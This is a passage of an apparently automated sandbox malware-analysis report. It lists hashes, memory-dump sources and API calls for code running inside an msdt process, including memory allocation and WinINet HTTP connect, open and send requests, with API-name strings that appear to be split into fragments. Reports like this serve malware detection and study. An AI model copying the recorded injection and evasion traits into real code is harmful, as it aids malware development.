                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: dcd478827937943d39c4e8bbce84474034440a221302cbdeb16639872b2a2354
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 83F0A4B2200208ABCB18DF89DC95EEB77ADAF8C754F158258BE1D97241D630E851CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00102D11,00002000,00003000,00000004), ref: 001187E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: efea0aed8800a5164445efd70447987edf92c32a68c54b4cf7f6f082f50b4b67
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: 71F015B2200208ABCB18DF89CC85EEB77ADAF88750F118158BE1897241C630F810CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00113D40,?,?,00113D40,00000000,FFFFFFFF), ref: 00118725
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 03622e8d5fda47d19aa1731f9077bf4c6c522fe9211fa538e0890531c628906f
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: E6D012752002147BD714EB98CC49ED7779CEF44760F154455BA185B242C570F54086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 109 118ce0-118d26 call 119280 112 118d28-118d4e HttpOpenRequestA 109->112 113 118d4f-118d55 109->113
                                                                    APIs
                                                                    • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00118D48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                    • API String ID: 1984915467-4016285707
                                                                    • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                    • Instruction ID: 30041cc37ad6a69c6afab9055cbc355ced46a27f2f5bafc255ecd933d33d4acd
                                                                    • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                    • Instruction Fuzzy Hash: 9701E9B2905159AFCB04DF98D841DEF7BB9EB48210F158298FD08A7205D630ED10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 114 118d60-118da6 call 119280 117 118dc3-118dc9 114->117 118 118da8-118dc2 HttpSendRequestA 114->118
                                                                    APIs
                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00118DBC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpRequestSend
                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                    • API String ID: 360639707-2503632690
                                                                    • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                    • Instruction ID: 03d14c32d01c4aa8e36aa776a09cf143c50321c79be6586df34e5794f6a158a1
                                                                    • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                    • Instruction Fuzzy Hash: A801FFB2905119AFCB14DF98D8459EF7BB8EB54210F158199FD18A7205D770EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): blocks 118c60-118ca6 (call 119280), 118ca8-118cce (InternetConnectA), 118ccf-118cd5
APIs
• InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00118CC8
Memory Dump Source
• Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_100000_msdt.jbxd
Similarity
• API ID: ConnectInternet
• String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
